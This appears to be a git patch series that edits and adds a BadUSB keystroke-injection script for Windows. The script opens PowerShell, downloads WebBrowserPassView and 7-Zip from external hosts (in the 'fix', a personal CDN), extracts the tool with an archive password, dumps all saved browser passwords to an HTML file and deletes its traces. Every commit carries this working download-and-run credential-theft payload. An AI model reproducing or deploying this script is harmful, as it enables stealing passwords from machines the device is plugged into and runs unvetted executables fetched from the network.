From dae2dd1b7bfcec20a6216790a94a2e152f414381 Mon Sep 17 00:00:00 2001 From: jbohack Date: Thu, 23 Feb 2023 20:15:39 -0500 Subject: [PATCH 1/3] Fixed an error with expanding the archive. Upon expanding the archive originally, it would throw an error. Resolved this by repacking the archive and reuploading the files to my CDN. Feel free to check the checksum to verify the files are the same :D Here is a screenshot of the initial issue https://cdn.lullaby.cafe/img/Mv3hqPUcrh0VrMP.png --- BadUSB/Show_Saved_Passwords.txt | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/BadUSB/Show_Saved_Passwords.txt b/BadUSB/Show_Saved_Passwords.txt index 1b0dc5078..43b8fcb58 100644 --- a/BadUSB/Show_Saved_Passwords.txt +++ b/BadUSB/Show_Saved_Passwords.txt @@ -3,10 +3,12 @@ DELAY 1000 STRING powershell ENTER DELAY 1000 -STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip ENTER -DELAY 5000 -STRING wbpv28821@ +DELAY 1000 +STRING rmdir -R \temp +ENTER +DELAY 1000 +STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip ENTER STRING .\WebBrowserPassView.exe ENTER @@ -31,4 +33,4 @@ ENTER STRING rmdir -R \temp ENTER STRING EXIT -ENTER \ No newline at end of file +ENTER From a271e398c4c051473b60566faa465c1591f1d1c1 Mon Sep 17 00:00:00 2001 From: jbohack Date: Fri, 24 Feb 2023 16:03:59 -0500 Subject: [PATCH 2/3] Revert "Fixed an error with expanding the archive." This reverts commit dae2dd1b7bfcec20a6216790a94a2e152f414381. --- BadUSB/Show_Saved_Passwords.txt | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/BadUSB/Show_Saved_Passwords.txt b/BadUSB/Show_Saved_Passwords.txt index 43b8fcb58..1b0dc5078 100644 --- a/BadUSB/Show_Saved_Passwords.txt +++ b/BadUSB/Show_Saved_Passwords.txt @@ -3,12 +3,10 @@ DELAY 1000 STRING powershell ENTER DELAY 1000 +STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip ENTER -DELAY 1000 -STRING rmdir -R \temp -ENTER -DELAY 1000 -STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip +DELAY 5000 +STRING wbpv28821@ ENTER STRING .\WebBrowserPassView.exe ENTER @@ -33,4 +31,4 @@ ENTER STRING rmdir -R \temp ENTER STRING EXIT -ENTER +ENTER \ No newline at end of file From dade15f4772cfeee35e5b41518d3d01fea6bdee4 Mon Sep 17 00:00:00 2001 From: jbohack Date: Fri, 24 Feb 2023 16:04:29 -0500 Subject: [PATCH 3/3] created separate file for the fix --- BadUSB/Show_Saved_Passwords_FIXED.txt | 36 +++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 BadUSB/Show_Saved_Passwords_FIXED.txt diff --git a/BadUSB/Show_Saved_Passwords_FIXED.txt b/BadUSB/Show_Saved_Passwords_FIXED.txt new file mode 100644 index 000000000..43b8fcb58 --- /dev/null +++ b/BadUSB/Show_Saved_Passwords_FIXED.txt @@ -0,0 +1,36 @@ +GUI r +DELAY 1000 +STRING powershell +ENTER +DELAY 1000 +ENTER +DELAY 1000 +STRING rmdir -R \temp +ENTER +DELAY 1000 +STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip +ENTER +STRING .\WebBrowserPassView.exe +ENTER +DELAY 3000 +CTRL A +CTRL S +DELAY 1000 +STRING export.html +TAB +STRING h +ENTER +DELAY 1000 +ALT F4 +DELAY 1000 +STRING Start-Process msedge.exe 'file:///C:/temp/export.htm --inprivate' +ENTER +DELAY 2000 +ALT TAB +DELAY 1000 +STRING cd \ +ENTER +STRING rmdir -R \temp +ENTER +STRING EXIT +ENTER